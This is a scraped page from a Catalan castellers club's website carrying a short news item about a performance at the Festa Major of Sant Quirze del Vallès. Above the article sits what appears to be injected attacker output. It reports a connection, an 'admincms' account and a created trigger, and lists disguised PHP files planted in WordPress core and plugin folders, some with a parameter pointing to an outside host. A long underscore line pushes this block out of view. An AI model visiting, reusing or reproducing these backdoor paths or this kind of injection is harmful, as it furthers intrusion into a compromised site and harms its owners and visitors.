Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?core https://castellersdeberga.cat/wp-admin/includes/class-wp-importer-stream-ajax-response-cron-meta-stream-private.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/privacy-policy-guide-private-meta-stream-core-private.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/admin-filters-ajax-response-ajax-meta-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/woo-redsys-gateway-light/woocommerce-redsys-cron-cron-stream.php https://castellersdeberga.cat/wp-content/plugins/the-events-calendar/the-events-calendar-meta-stream-cron-cron-stream-private-ajax.php https://castellersdeberga.cat/wp-includes/taxonomy-wp-meta-private.php https://castellersdeberga.cat/wp-includes/ID3/module.audio-video.riff-core-meta-meta.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Festa Major a Sant Quirze del Vallès
 

Festa Major a Sant Quirze del Vallès


Festa Major a Sant Quirze del VallèsEls Castellers de Berga vam actuar dissabte 29 d’agost, a la Festa Major de Sant Quirze del Vallès. Una tarda calorosa d’estiu i el Parc de les Morisques  van ser el marc de l’actuació on vam acompanyar els nostres padrins, els Castellers de Sabadell. Gegants, sardanes i castells en una Festa Major molt animada.
El Parc de les Morisques es va anar omplint de públic a mesura que el sol afluixava. En primera ronda vam descarregar el castell més destacat: el 3 de 7. Seguidament també vam descarregar el 3 de 6 amb agulla i el 4 de 6. Els Castellers de Sabadell van descarregar el 3 i el 4 de 8 i el 5 de 7, amb la vista posada a l’actuació de la seva Festa Major, la setmana vinent.
Els Castellers de Berga actuem el següent cap de setmana a casa dels altres padrins, els Castellers de Solsona. Serà diumenge 6 de setembre, dins els actes de la Festa Major de Solsona.